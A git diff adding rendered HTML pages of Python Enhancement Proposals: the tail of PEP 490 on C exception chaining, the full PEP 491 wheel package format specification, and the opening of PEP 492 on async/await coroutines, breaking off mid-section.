  • +
  • sys_write(), sys_format(): ignore exception
  • +
  • _PyTraceback_Add(): ignore exception
  • +
  • PyTraceBack_Print(): ignore exception
  • +
+

Examples of functions displaying the new exception to sys.stderr:

+
    +
  • atexit_callfuncs(): display exceptions with +PyErr_Display() and return the latest exception, the function +calls multiple callbacks and only returns the latest exception
  • +
  • sock_dealloc(): log the ResourceWarning exception with +PyErr_WriteUnraisable()
  • +
  • slot_tp_del(): display exception with +PyErr_WriteUnraisable()
  • +
  • _PyGen_Finalize(): display gen_close() exception with +PyErr_WriteUnraisable()
  • +
  • slot_tp_finalize(): display exception raised by the +__del__() method with PyErr_WriteUnraisable()
  • +
  • PyErr_GivenExceptionMatches(): display exception raised by +PyType_IsSubtype() with PyErr_WriteUnraisable()
  • +
+
+
+
+

Backward compatibility

+

A side effect of chaining exceptions is that exceptions store traceback objects, which store frame objects, which store local variables. Local variables are kept alive by exceptions. A common issue is a reference cycle between local variables and exceptions: an exception is stored in a local variable while the frame is indirectly stored in the exception. The cycle only impacts applications storing exceptions.

+

The reference cycle can now be fixed with the new +traceback.TracebackException object introduced in Python 3.5. It +stores information required to format a full textual traceback without +storing local variables.
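For example (an illustrative use, not code from the PEP), the cycle can be avoided by capturing the formatted data instead of keeping the exception itself:

import traceback

try:
    1 / 0
except ZeroDivisionError as exc:
    # Extracts everything needed to render the traceback later,
    # without keeping frames and their local variables alive.
    tb_info = traceback.TracebackException.from_exception(exc)

print(''.join(tb_info.format()))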

+

The asyncio module is impacted by the reference cycle issue. This module is also maintained outside the Python standard library to release a version for Python 3.3. traceback.TracebackException will maybe be backported into a private asyncio module to fix reference cycle issues.

+
+
+

Alternatives

+
+

No change

+

A new private _PyErr_ChainExceptions() function is enough to chain exceptions manually.

+

Exceptions will only be chained explicitly where it makes sense.

+
+
+

New helpers to chain exceptions

+

Functions like PyErr_SetString() don’t chain exceptions automatically. To make the usage of _PyErr_ChainExceptions() easier, new private functions are added:

+
    +
  • _PyErr_SetStringChain(exc_type, message)
  • +
  • _PyErr_FormatChain(exc_type, format, ...)
  • +
  • _PyErr_SetNoneChain(exc_type)
  • +
  • _PyErr_SetObjectChain(exc_type, exc_value)
  • +
+

Helper functions to raise specific exceptions like +_PyErr_SetKeyError(key) or PyErr_SetImportError(message, name, +path) don’t chain exceptions. The generic +_PyErr_ChainExceptions(exc_type, exc_value, exc_tb) should be used +to chain exceptions with these helper functions.

+
+
+
+

Appendix

+
+

PEPs

+
    +
  • PEP 3134 – Exception Chaining and Embedded Tracebacks +(Python 3.0): +new __context__ and __cause__ attributes for exceptions
  • +
  • PEP 415 – Implement context suppression with exception attributes +(Python 3.3): +raise exc from None
  • +
  • PEP 409 – Suppressing exception context +(superseded by the PEP 415)
  • +
+
+
+

Python C API

+

The header file Include/pyerror.h declares functions related to +exceptions.

+

Functions raising exceptions:

+
    +
  • PyErr_SetNone(exc_type)
  • +
  • PyErr_SetObject(exc_type, exc_value)
  • +
  • PyErr_SetString(exc_type, message)
  • +
  • PyErr_Format(exc, format, ...)
  • +
+

Helpers to raise specific exceptions:

+
    +
  • PyErr_BadArgument()
  • +
  • PyErr_BadInternalCall()
  • +
  • PyErr_NoMemory()
  • +
  • PyErr_SetFromErrno(exc)
  • +
  • PyErr_SetFromWindowsErr(err)
  • +
  • PyErr_SetImportError(message, name, path)
  • +
  • _PyErr_SetKeyError(key)
  • +
  • _PyErr_TrySetFromCause(prefix_format, ...)
  • +
+

Manage the current exception:

+
    +
  • PyErr_Clear(): clear the current exception, +like except: pass
  • +
  • PyErr_Fetch(exc_type, exc_value, exc_tb)
  • +
  • PyErr_Restore(exc_type, exc_value, exc_tb)
  • +
  • PyErr_GetExcInfo(exc_type, exc_value, exc_tb)
  • +
  • PyErr_SetExcInfo(exc_type, exc_value, exc_tb)
  • +
+

Other functions to handle exceptions:

+
    +
  • PyErr_ExceptionMatches(exc): check to implement +except exc:  ...
  • +
  • PyErr_GivenExceptionMatches(exc1, exc2)
  • +
  • PyErr_NormalizeException(exc_type, exc_value, exc_tb)
  • +
  • _PyErr_ChainExceptions(exc_type, exc_value, exc_tb)
  • +
+
+
+

Python Issues

+

Chain exceptions:

+ +

Changes that prevent losing exceptions:

+ +
+
+
+

Rejection

+

The PEP was rejected on 2017-09-12 by Victor Stinner. It was decided in +the python-dev discussion to not chain C exceptions by default, but +instead chain them explicitly only where it makes sense.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0490.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0491/index.html b/pep-0491/index.html new file mode 100644 index 00000000000..a1d4b34b434 --- /dev/null +++ b/pep-0491/index.html @@ -0,0 +1,682 @@ + + + + + + + + PEP 491 – The Wheel Binary Package Format 1.9 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 491 – The Wheel Binary Package Format 1.9

+
+
Author:
+
Daniel Holth <dholth at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Apr-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the second version of a built-package format for Python +called “wheel”. Wheel provides a Python-specific, relocatable package format +that allows people to install software more quickly and predictably than +re-building from source each time.

+

A wheel is a ZIP-format archive with a specially formatted file name and +the .whl extension. It contains a single distribution nearly as it +would be installed according to PEP 376 with a particular installation +scheme. Simple wheels can be unpacked onto sys.path and used directly +but wheels are usually installed with a specialized installer.

+

This version of the wheel specification adds support for installing +distributions into many different directories, and adds a way to find +those files after they have been installed.

+
+
+

PEP Deferral

+

This PEP is not currently being actively pursued, with Python packaging +improvements currently focusing on the package build process rather than +expanding the binary archive format to cover additional use cases.

+

Some specific elements to be addressed when work on this PEP is resumed in the +future:

+
    +
  • migrating the official wheel format definition to +https://packaging.python.org/specifications/ (similar to what PEP 566 did for +https://packaging.python.org/specifications/core-metadata/)
  • +
  • updating the PEP itself to focus on the changes being made between the +two versions of the format and the rationale for those changes, rather than +having to repeat all the information that is unchanged from PEP 427
  • +
  • clarifying that the PEP is deliberately written to allow existing installers +to be compliant with the specification when using existing install scheme +definitions, while also allowing the creation of new install scheme +definitions that take advantage of the richer categorisation scheme for +the contents of the binary archive
  • +
+
+
+

Rationale

+

Wheel 1.0 is best at installing files into site-packages and a few other locations specified by distutils, but users would like to install files from a single distribution into many directories – perhaps separate locations for docs, data, and code. Unfortunately, not everyone agrees on where these install locations should be relative to the root directory. This version of the format adds many more categories, each of which can be installed to a different destination based on policy. Since it might also be important to locate the installed files at runtime, this version of the format also adds a way to record the installed paths in a form that can be read by the installed software.

+
+
+

Details

+
+

Installing a wheel ‘distribution-1.0-py32-none-any.whl’

+

Wheel installation notionally consists of two phases:

+
    +
  • Unpack.
      +
    1. Parse distribution-1.0.dist-info/WHEEL.
    2. +
    3. Check that installer is compatible with Wheel-Version. Warn if +minor version is greater, abort if major version is greater.
    4. +
    5. If Root-Is-Purelib == ‘true’, unpack archive into purelib +(site-packages).
    6. +
    7. Else unpack archive into platlib (site-packages).
    8. +
    +
  • +
  • Spread.
      +
    1. Unpacked archive includes distribution-1.0.dist-info/ and (if +there is data) distribution-1.0.data/.
    2. +
    3. Move each subtree of distribution-1.0.data/ onto its +destination path. Each subdirectory of distribution-1.0.data/ +is a key into a dict of destination directories, such as +distribution-1.0.data/(purelib|platlib|headers|scripts|data).
    4. +
    5. Update scripts starting with #!python to point to the correct +interpreter. (Note: Python scripts are usually handled by package +metadata, and not included verbatim in wheel.)
    6. +
    7. Update distribution-1.0.dist-info/RECORD with the installed paths.
    8. +
    9. If empty, remove the distribution-1.0.data directory.
    10. +
    11. Compile any installed .py to .pyc. (Uninstallers should be smart +enough to remove .pyc even if it is not mentioned in RECORD.)
    12. +
    +
  • +
+
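A rough sketch of the spread phase, assuming scheme is a dict mapping category names to destination directories (this is an illustration, not a real installer implementation):

import os
import shutil

def spread(data_dir, scheme):
    # Move each subtree of distribution-1.0.data/ onto its destination.
    for key in os.listdir(data_dir):
        source = os.path.join(data_dir, key)
        destination = scheme[key]              # e.g. scheme['scripts']
        os.makedirs(destination, exist_ok=True)
        for name in os.listdir(source):
            shutil.move(os.path.join(source, name),
                        os.path.join(destination, name))
        os.rmdir(source)
    # If empty, remove the distribution-1.0.data directory.
    if not os.listdir(data_dir):
        os.rmdir(data_dir)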

In practice, installers will usually extract files directly from the archive +to their destinations without writing a temporary distribution-1.0.data/ +directory.

+ + +
+
+

File Format

+
+

File name convention

+

The wheel filename is {distribution}-{version}(-{build +tag})?-{python tag}-{abi tag}-{platform tag}.whl.

+
+
distribution
Distribution name, e.g. ‘django’, ‘pyramid’.
+
version
Distribution version, e.g. 1.0.
+
build tag
Optional build number. Must start with a digit. A tie breaker +if two wheels have the same version. Sort as the empty string +if unspecified, else sort the initial digits as a number, and the +remainder lexicographically.
+
language implementation and version tag
E.g. ‘py27’, ‘py2’, ‘py3’.
+
abi tag
E.g. ‘cp33m’, ‘abi3’, ‘none’.
+
platform tag
E.g. ‘linux_x86_64’, ‘any’.
+
+

For example, distribution-1.0-1-py27-none-any.whl is the first +build of a package called ‘distribution’, and is compatible with +Python 2.7 (any Python 2.7 implementation), with no ABI (pure Python), +on any CPU architecture.

+

The last three components of the filename before the extension are +called “compatibility tags.” The compatibility tags express the +package’s basic interpreter requirements and are detailed in PEP 425.
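As a rough illustration (not part of the specification), a compliant filename can be split into these components; hyphens inside the distribution name are escaped to underscores, so splitting on - is safe for compliant names:

def parse_wheel_filename(filename):
    # Sketch only: assumes a compliant, already-escaped filename.
    stem = filename[:-len(".whl")]
    parts = stem.split("-")
    if len(parts) == 6:                      # optional build tag present
        distribution, version, build, python, abi, platform = parts
    else:
        distribution, version, python, abi, platform = parts
        build = ""
    return distribution, version, build, python, abi, platform

print(parse_wheel_filename("distribution-1.0-1-py27-none-any.whl"))
# ('distribution', '1.0', '1', 'py27', 'none', 'any')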

+
+
+

Escaping and Unicode

+

Each component of the filename is escaped by replacing runs of +non-alphanumeric characters with an underscore _:

+
re.sub("[^\w\d.]+", "_", distribution, re.UNICODE)
+
+
+
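For example, applied to a couple of component values:

import re

def escape(component):
    # Runs of characters outside [A-Za-z0-9._] collapse to one underscore.
    return re.sub(r"[^\w\d.]+", "_", component, flags=re.UNICODE)

print(escape("my-package"))    # my_package
print(escape("1.0+local"))     # 1.0_local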

The archive filename is Unicode. The packaging tools may only support +ASCII package names, but Unicode filenames are supported in this +specification.

+

The filenames inside the archive are encoded as UTF-8. Although some +ZIP clients in common use do not properly display UTF-8 filenames, +the encoding is supported by both the ZIP specification and Python’s +zipfile.

+
+
+

File contents

+

The contents of a wheel file, where {distribution} is replaced with the +name of the package, e.g. beaglevote and {version} is replaced with +its version, e.g. 1.0.0, consist of:

+
    +
  1. /, the root of the archive, contains all files to be installed in +purelib or platlib as specified in WHEEL. purelib and +platlib are usually both site-packages.
  2. +
  3. {distribution}-{version}.dist-info/ contains metadata.
  4. +
  5. {distribution}-{version}.data/ contains one subdirectory +for each non-empty install scheme key not already covered, where +the subdirectory name is an index into a dictionary of install paths +(e.g. data, scripts, include, purelib, platlib).
  6. +
  7. Python scripts must appear in scripts and begin with exactly +b'#!python' in order to enjoy script wrapper generation and +#!python rewriting at install time. They may have any or no +extension.
  8. +
  9. {distribution}-{version}.dist-info/METADATA is Metadata version 1.1 +or greater format metadata.
  10. +
  11. {distribution}-{version}.dist-info/WHEEL is metadata about the archive +itself in the same basic key: value format:
    Wheel-Version: 1.9
    +Generator: bdist_wheel 1.9
    +Root-Is-Purelib: true
    +Tag: py2-none-any
    +Tag: py3-none-any
    +Build: 1
    +Install-Paths-To: wheel/_paths.py
    +Install-Paths-To: wheel/_paths.json
    +
    +
    +
  12. +
  13. Wheel-Version is the version number of the Wheel specification.
  14. +
  15. Generator is the name and optionally the version of the software +that produced the archive.
  16. +
  17. Root-Is-Purelib is true if the top level directory of the archive +should be installed into purelib; otherwise the root should be installed +into platlib.
  18. +
  19. Tag is the wheel’s expanded compatibility tags; in the example the +filename would contain py2.py3-none-any.
  20. +
  21. Build is the build number and is omitted if there is no build number.
  22. +
  23. Install-Paths-To is a location relative to the archive that will be +overwritten with the install-time paths of each category in the install +scheme. See the install paths section. May appear 0 or more times.
  24. +
  25. A wheel installer should warn if Wheel-Version is greater than the +version it supports, and must fail if Wheel-Version has a greater +major version than the version it supports.
  26. +
  27. Wheel, being an installation format that is intended to work across +multiple versions of Python, does not generally include .pyc files.
  28. +
  29. Wheel does not contain setup.py or setup.cfg.
  30. +
+
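The WHEEL file shown in item 11 uses the same key: value format as email headers, so a sketch of reading it could use the stdlib parser (multi-use keys such as Tag come back as a list):

import email.parser

WHEEL = """\
Wheel-Version: 1.9
Generator: bdist_wheel 1.9
Root-Is-Purelib: true
Tag: py2-none-any
Tag: py3-none-any
Build: 1
Install-Paths-To: wheel/_paths.py
Install-Paths-To: wheel/_paths.json
"""

msg = email.parser.Parser().parsestr(WHEEL)
print(msg["Wheel-Version"])    # 1.9
print(msg.get_all("Tag"))      # ['py2-none-any', 'py3-none-any']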
+
The .dist-info directory
+
    +
  1. Wheel .dist-info directories include at a minimum METADATA, WHEEL, +and RECORD.
  2. +
  3. METADATA is the package metadata, the same format as PKG-INFO as +found at the root of sdists.
  4. +
  5. WHEEL is the wheel metadata specific to a build of the package.
  6. +
  7. RECORD is a list of (almost) all the files in the wheel and their +secure hashes. Unlike PEP 376, every file except RECORD, which +cannot contain a hash of itself, must include its hash. The hash +algorithm must be sha256 or better; specifically, md5 and sha1 are +not permitted, as signed wheel files rely on the strong hashes in +RECORD to validate the integrity of the archive.
  8. +
  9. PEP 376’s INSTALLER and REQUESTED are not included in the archive.
  10. +
  11. RECORD.jws is used for digital signatures. It is not mentioned in +RECORD.
  12. +
  13. RECORD.p7s is allowed as a courtesy to anyone who would prefer to +use S/MIME signatures to secure their wheel files. It is not +mentioned in RECORD.
  14. +
  15. During extraction, wheel installers verify all the hashes in RECORD +against the file contents. Apart from RECORD and its signatures, +installation will fail if any file in the archive is not both +mentioned and correctly hashed in RECORD.
  16. +
+
+
+
The .data directory
+

Any file that is not normally installed inside site-packages goes into +the .data directory, named as the .dist-info directory but with the +.data/ extension:

+
distribution-1.0.dist-info/
+
+distribution-1.0.data/
+
+
+

The .data directory contains subdirectories with the scripts, headers, +documentation and so forth from the distribution. During installation the +contents of these subdirectories are moved onto their destination paths.

+

If a subdirectory is not found in the install scheme, the installer should +emit a warning, and it should be installed at distribution-1.0.data/... +as if the package was unpacked by a standard unzip tool.

+
+
+
Install paths
+

In addition to the distutils install paths, wheel now includes the listed +categories based on GNU autotools. This expanded scheme should help installers +to implement system policy, but installers may root each category at any +location.

+

A UNIX install scheme might map the categories to their installation paths +like this:

+
{
+    'bindir': '$eprefix/bin',
+    'sbindir': '$eprefix/sbin',
+    'libexecdir': '$eprefix/libexec',
+    'sysconfdir': '$prefix/etc',
+    'sharedstatedir': '$prefix/com',
+    'localstatedir': '$prefix/var',
+    'libdir': '$eprefix/lib',
+    'static_libdir': r'$prefix/lib',
+    'includedir': '$prefix/include',
+    'datarootdir': '$prefix/share',
+    'datadir': '$datarootdir',
+    'mandir': '$datarootdir/man',
+    'infodir': '$datarootdir/info',
+    'localedir': '$datarootdir/locale',
+    'docdir': '$datarootdir/doc/$dist_name',
+    'htmldir': '$docdir',
+    'dvidir': '$docdir',
+    'psdir': '$docdir',
+    'pdfdir': '$docdir',
+    'pkgdatadir': '$datadir/$dist_name'
+}
+
+
+

If a package needs to find its files at runtime, it can request +they be written to a specified file or files by the installer and +included in those same files inside the archive itself, relative +to their location within the archive (so a wheel is still installed +correctly if unpacked with a standard unzip tool, or perhaps not +unpacked at all).

+

If the WHEEL metadata contains these fields:

+
Install-Paths-To: wheel/_paths.py
+Install-Paths-To: wheel/_paths.json
+
+
+

Then the wheel installer, when it is about to unpack wheel/_paths.py from +the archive, replaces it with the actual paths used at install time. The +paths may be absolute or relative to the generated file.

+

If the filename ends with .py then a Python script is written. The +script MUST be executed to get the paths, but it will probably look like +this:

+
data='../wheel-0.26.0.dev1.data/data'
+headers='../wheel-0.26.0.dev1.data/headers'
+platlib='../wheel-0.26.0.dev1.data/platlib'
+purelib='../wheel-0.26.0.dev1.data/purelib'
+scripts='../wheel-0.26.0.dev1.data/scripts'
+# ...
+
+
+

If the filename ends with .json then a JSON document is written:

+
{ "data": "../wheel-0.26.0.dev1.data/data", ... }
+
+
+

Only the categories actually used by a particular wheel must be written to +this file.

+

These files are designed to be written to a location that can be found by the +installed package without introducing any dependency on a packaging library.
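For instance, a package that declared Install-Paths-To: wheel/_paths.json might locate its data directory at runtime with a sketch like this (file and key names follow the example above):

import json
import os

_here = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_here, "_paths.json")) as f:
    paths = json.load(f)

# Entries may be relative to the generated file, so resolve them here.
data_dir = os.path.normpath(os.path.join(_here, paths["data"]))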

+
+
+
+
+

Signed wheel files

+

Wheel files include an extended RECORD that enables digital signatures. PEP 376’s RECORD is altered to include a secure hash, digestname=urlsafe_b64encode_nopad(digest) (urlsafe base64 encoding with no trailing = characters), as the second column instead of an md5sum. All possible entries are hashed, including any generated files such as .pyc files, but not RECORD, which cannot contain its own hash. For example:

+
file.py,sha256=AVTFPZpEKzuHr7OvQZmhaU3LvwKz06AJw8mT_pNh2yI,3144
+distribution-1.0.dist-info/RECORD,,
+
+
+

The signature file(s) RECORD.jws and RECORD.p7s are not mentioned in +RECORD at all since they can only be added after RECORD is generated. +Every other file in the archive must have a correct hash in RECORD +or the installation will fail.

+

If JSON web signatures are used, one or more JSON Web Signature JSON +Serialization (JWS-JS) signatures is stored in a file RECORD.jws adjacent +to RECORD. JWS is used to sign RECORD by including the SHA-256 hash of +RECORD as the signature’s JSON payload:

+
{ "hash": "sha256=ADD-r2urObZHcxBW3Cr-vDCu5RJwT4CaRTHiFmbcIYY" }
+
+
+

(The hash value is the same format used in RECORD.)
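A sketch of how such a RECORD entry could be produced, using the nopad encoding shown in the Appendix:

import base64
import hashlib

def record_hash(data):
    # sha256 digest, urlsafe-base64 encoded, trailing '=' stripped.
    digest = hashlib.sha256(data).digest()
    return "sha256=" + base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")

with open("file.py", "rb") as f:   # assumes a file.py to hash
    contents = f.read()
print("file.py,{},{}".format(record_hash(contents), len(contents)))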

+

If RECORD.p7s is used, it must contain a detached S/MIME format signature +of RECORD.

+

A wheel installer is not required to understand digital signatures but +MUST verify the hashes in RECORD against the extracted file contents. +When the installer checks file hashes against RECORD, a separate signature +checker only needs to establish that RECORD matches the signature.

+

See

+ +
+
+

Comparison to .egg

+
    +
  1. Wheel is an installation format; egg is importable. Wheel archives +do not need to include .pyc and are less tied to a specific Python +version or implementation. Wheel can install (pure Python) packages +built with previous versions of Python so you don’t always have to +wait for the packager to catch up.
  2. +
  3. Wheel uses .dist-info directories; egg uses .egg-info. Wheel is +compatible with the new world of Python packaging and the new +concepts it brings.
  4. +
  5. Wheel has a richer file naming convention for today’s multi-implementation world. A single wheel archive can indicate its compatibility with a number of Python language versions and implementations, ABIs, and system architectures. Historically the ABI has been specific to a CPython release; wheel is ready for the stable ABI.
  6. +
  7. Wheel is lossless. The first wheel implementation bdist_wheel +always generates egg-info, and then converts it to a .whl. It is +also possible to convert existing eggs and bdist_wininst +distributions.
  8. +
  9. Wheel is versioned. Every wheel file contains the version of the +wheel specification and the implementation that packaged it. +Hopefully the next migration can simply be to Wheel 2.0.
  10. +
  11. Wheel is a reference to the other Python.
  12. +
+
+
+
+

FAQ

+
+

Wheel defines a .data directory. Should I put all my data there?

+
+
This specification does not have an opinion on how you should organize +your code. The .data directory is just a place for any files that are +not normally installed inside site-packages or on the PYTHONPATH. +In other words, you may continue to use pkgutil.get_data(package, +resource) even though those files will usually not be distributed +in wheel’s .data directory.
+
+
+

Why does wheel include attached signatures?

+
+
Attached signatures are more convenient than detached signatures +because they travel with the archive. Since only the individual files +are signed, the archive can be recompressed without invalidating +the signature or individual files can be verified without having +to download the whole archive.
+
+
+

Why does wheel allow JWS signatures?

+
+
The JOSE specifications of which JWS is a part are designed to be easy +to implement, a feature that is also one of wheel’s primary design +goals. JWS yields a useful, concise pure-Python implementation.
+
+
+

Why does wheel also allow S/MIME signatures?

+
+
S/MIME signatures are allowed for users who need or want to use +existing public key infrastructure with wheel.

Signed packages are only a basic building block in a secure package +update system. Wheel only provides the building block.

+
+
+
+

What’s the deal with “purelib” vs. “platlib”?

+
+
Wheel preserves the “purelib” vs. “platlib” distinction, which is +significant on some platforms. For example, Fedora installs pure +Python packages to ‘/usr/lib/pythonX.Y/site-packages’ and platform +dependent packages to ‘/usr/lib64/pythonX.Y/site-packages’.

A wheel with “Root-Is-Purelib: false” with all its files +in {name}-{version}.data/purelib is equivalent to a wheel with +“Root-Is-Purelib: true” with those same files in the root, and it +is legal to have files in both the “purelib” and “platlib” categories.

+

In practice a wheel should have only one of “purelib” or “platlib” +depending on whether it is pure Python or not and those files should +be at the root with the appropriate setting given for “Root-is-purelib”.

+
+
+
+

Is it possible to import Python code directly from a wheel file?

+
+
Technically, due to the combination of supporting installation via +simple extraction and using an archive format that is compatible with +zipimport, a subset of wheel files do support being placed directly +on sys.path. However, while this behaviour is a natural consequence +of the format design, actually relying on it is generally discouraged.

Firstly, wheel is designed primarily as a distribution format, so +skipping the installation step also means deliberately avoiding any +reliance on features that assume full installation (such as being able +to use standard tools like pip and virtualenv to capture and +manage dependencies in a way that can be properly tracked for auditing +and security update purposes, or integrating fully with the standard +build machinery for C extensions by publishing header files in the +appropriate place).

+

Secondly, while some Python software is written to support running +directly from a zip archive, it is still common for code to be written +assuming it has been fully installed. When that assumption is broken +by trying to run the software from a zip archive, the failures can often +be obscure and hard to diagnose (especially when they occur in third +party libraries). The two most common sources of problems with this +are the fact that importing C extensions from a zip archive is not +supported by CPython (since doing so is not supported directly by the +dynamic loading machinery on any platform) and that when running from +a zip archive the __file__ attribute no longer refers to an +ordinary filesystem path, but to a combination path that includes +both the location of the zip archive on the filesystem and the +relative path to the module inside the archive. Even when software +correctly uses the abstract resource APIs internally, interfacing with +external components may still require the availability of an actual +on-disk file.

+

Like metaclasses, monkeypatching and metapath importers, if you’re not +already sure you need to take advantage of this feature, you almost +certainly don’t need it. If you do decide to use it anyway, be +aware that many projects will require a failure to be reproduced with +a fully installed package before accepting it as a genuine bug.

+
+
+
+
+

Appendix

+

Example urlsafe-base64-nopad implementation:

+
# urlsafe-base64-nopad for Python 3
+import base64
+
+def urlsafe_b64encode_nopad(data):
+    return base64.urlsafe_b64encode(data).rstrip(b'=')
+
+def urlsafe_b64decode_nopad(data):
+    pad = b'=' * (4 - (len(data) & 3))
+    return base64.urlsafe_b64decode(data + pad)
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0491.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0492/index.html b/pep-0492/index.html new file mode 100644 index 00000000000..2bf499a2fd6 --- /dev/null +++ b/pep-0492/index.html @@ -0,0 +1,1588 @@ + + + + + + + + PEP 492 – Coroutines with async and await syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 492 – Coroutines with async and await syntax

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Apr-2015
+
Python-Version:
+
3.5
+
Post-History:
+
17-Apr-2015, 21-Apr-2015, 27-Apr-2015, 29-Apr-2015, 05-May-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

The growth of Internet and general connectivity has triggered the +proportionate need for responsive and scalable code. This proposal +aims to answer that need by making writing explicitly asynchronous, +concurrent Python code easier and more Pythonic.

+

It is proposed to make coroutines a proper standalone concept in +Python, and introduce new supporting syntax. The ultimate goal +is to help establish a common, easily approachable, mental +model of asynchronous programming in Python and make it as close to +synchronous programming as possible.

+

This PEP assumes that the asynchronous tasks are scheduled and +coordinated by an Event Loop similar to that of stdlib module +asyncio.events.AbstractEventLoop. While the PEP is not tied to any +specific Event Loop implementation, it is relevant only to the kind of +coroutine that uses yield as a signal to the scheduler, indicating +that the coroutine will be waiting until an event (such as IO) is +completed.

+

We believe that the changes proposed here will help keep Python +relevant and competitive in a quickly growing area of asynchronous +programming, as many other languages have adopted, or are planning to +adopt, similar features: [2], [5], [6], [7], [8], [10].

+
+
+

API Design and Implementation Revisions

+
    +
  1. Feedback on the initial beta release of Python 3.5 resulted in a +redesign of the object model supporting this PEP to more clearly +separate native coroutines from generators - rather than being a +new kind of generator, native coroutines are now their own +completely distinct type (implemented in [17]).

    This change was implemented based primarily due to problems +encountered attempting to integrate support for native coroutines +into the Tornado web server (reported in [18]).

    +
  2. +
  3. In CPython 3.5.2, the __aiter__ protocol was updated.

    Before 3.5.2, __aiter__ was expected to return an awaitable +resolving to an asynchronous iterator. Starting with 3.5.2, +__aiter__ should return asynchronous iterators directly.

    +

    If the old protocol is used in 3.5.2, Python will raise a +PendingDeprecationWarning.

    +

    In CPython 3.6, the old __aiter__ protocol will still be +supported with a DeprecationWarning being raised.

    +

    In CPython 3.7, the old __aiter__ protocol will no longer be +supported: a RuntimeError will be raised if __aiter__ +returns anything but an asynchronous iterator.

    +

    See [19] and [20] for more details.

    +
  4. +
+
+
+

Rationale and Goals

+

Current Python supports implementing coroutines via generators (PEP +342), further enhanced by the yield from syntax introduced in PEP +380. This approach has a number of shortcomings:

+
    +
  • It is easy to confuse coroutines with regular generators, since they +share the same syntax; this is especially true for new developers.
  • +
  • Whether or not a function is a coroutine is determined by the presence of yield or yield from statements in its body, which can lead to unobvious errors when such statements appear in or disappear from a function body during refactoring.
  • +
  • Support for asynchronous calls is limited to expressions where +yield is allowed syntactically, limiting the usefulness of +syntactic features, such as with and for statements.
  • +
+

This proposal makes coroutines a native Python language feature, and +clearly separates them from generators. This removes +generator/coroutine ambiguity, and makes it possible to reliably define +coroutines without reliance on a specific library. This also enables +linters and IDEs to improve static code analysis and refactoring.

+

Native coroutines and the associated new syntax features make it +possible to define context manager and iteration protocols in +asynchronous terms. As shown later in this proposal, the new async +with statement lets Python programs perform asynchronous calls when +entering and exiting a runtime context, and the new async for +statement makes it possible to perform asynchronous calls in iterators.

+
+
+

Specification

+

This proposal introduces new syntax and semantics to enhance coroutine +support in Python.

+

This specification presumes knowledge of the implementation of +coroutines in Python (PEP 342 and PEP 380). Motivation for the syntax +changes proposed here comes from the asyncio framework (PEP 3156) and +the “Cofunctions” proposal (PEP 3152, now rejected in favor of this +specification).

+

From this point in this document we use the word native coroutine to +refer to functions declared using the new syntax. generator-based +coroutine is used where necessary to refer to coroutines that are +based on generator syntax. coroutine is used in contexts where both +definitions are applicable.

+
+

New Coroutine Declaration Syntax

+

The following new syntax is used to declare a native coroutine:

+
async def read_data(db):
+    pass
+
+
+

Key properties of coroutines:

+
    +
  • async def functions are always coroutines, even if they do not +contain await expressions.
  • +
  • It is a SyntaxError to have yield or yield from +expressions in an async function.
  • +
  • Internally, two new code object flags were introduced:
      +
    • CO_COROUTINE is used to mark native coroutines +(defined with new syntax).
    • +
    • CO_ITERABLE_COROUTINE is used to make generator-based +coroutines compatible with native coroutines (set by +types.coroutine() function).
    • +
    +
  • +
  • Regular generators, when called, return a generator object; similarly, coroutines return a coroutine object (see the sketch after this list).
  • +
  • StopIteration exceptions are not propagated out of coroutines, +and are replaced with a RuntimeError. For regular generators +such behavior requires a future import (see PEP 479).
  • +
  • When a native coroutine is garbage collected, a RuntimeWarning +is raised if it was never awaited on (see also +Debugging Features).
  • +
  • See also Coroutine objects section.
  • +
+
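Illustrating that calling a coroutine only creates a coroutine object; nothing runs until it is awaited. The driving code below uses 3.5-era asyncio:

import asyncio

async def read_data(db):
    return db

obj = read_data("mydb")        # creates a coroutine object; body not started
print(type(obj).__name__)      # coroutine

loop = asyncio.get_event_loop()
print(loop.run_until_complete(obj))   # mydb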
+
+

types.coroutine()

+

A new function coroutine(fn) is added to the types module. It +allows interoperability between existing generator-based coroutines +in asyncio and native coroutines introduced by this PEP:

+
@types.coroutine
+def process_data(db):
+    data = yield from read_data(db)
+    ...
+
+
+

The function applies the CO_ITERABLE_COROUTINE flag to the generator function’s code object, making it return a coroutine object.

+

If fn is not a generator function, it is wrapped. If it returns +a generator, it will be wrapped in an awaitable proxy object +(see below the definition of awaitable objects).

+

Note that the CO_COROUTINE flag is not applied by types.coroutine(), to make it possible to separate native coroutines defined with the new syntax from generator-based coroutines.

+
+
+

Await Expression

+

The following new await expression is used to obtain a result of +coroutine execution:

+
async def read_data(db):
+    data = await db.fetch('SELECT ...')
+    ...
+
+
+

await, similarly to yield from, suspends execution of +read_data coroutine until db.fetch awaitable completes and +returns the result data.

+

It uses the yield from implementation with an extra step of +validating its argument. await only accepts an awaitable, which +can be one of:

+
    +
  • A native coroutine object returned from a native coroutine +function.
  • +
  • A generator-based coroutine object returned from a function +decorated with types.coroutine().
  • +
  • An object with an __await__ method returning an iterator.

    Any yield from chain of calls ends with a yield. This is a +fundamental mechanism of how Futures are implemented. Since, +internally, coroutines are a special kind of generators, every +await is suspended by a yield somewhere down the chain of +await calls (please refer to PEP 3156 for a detailed +explanation).

    +

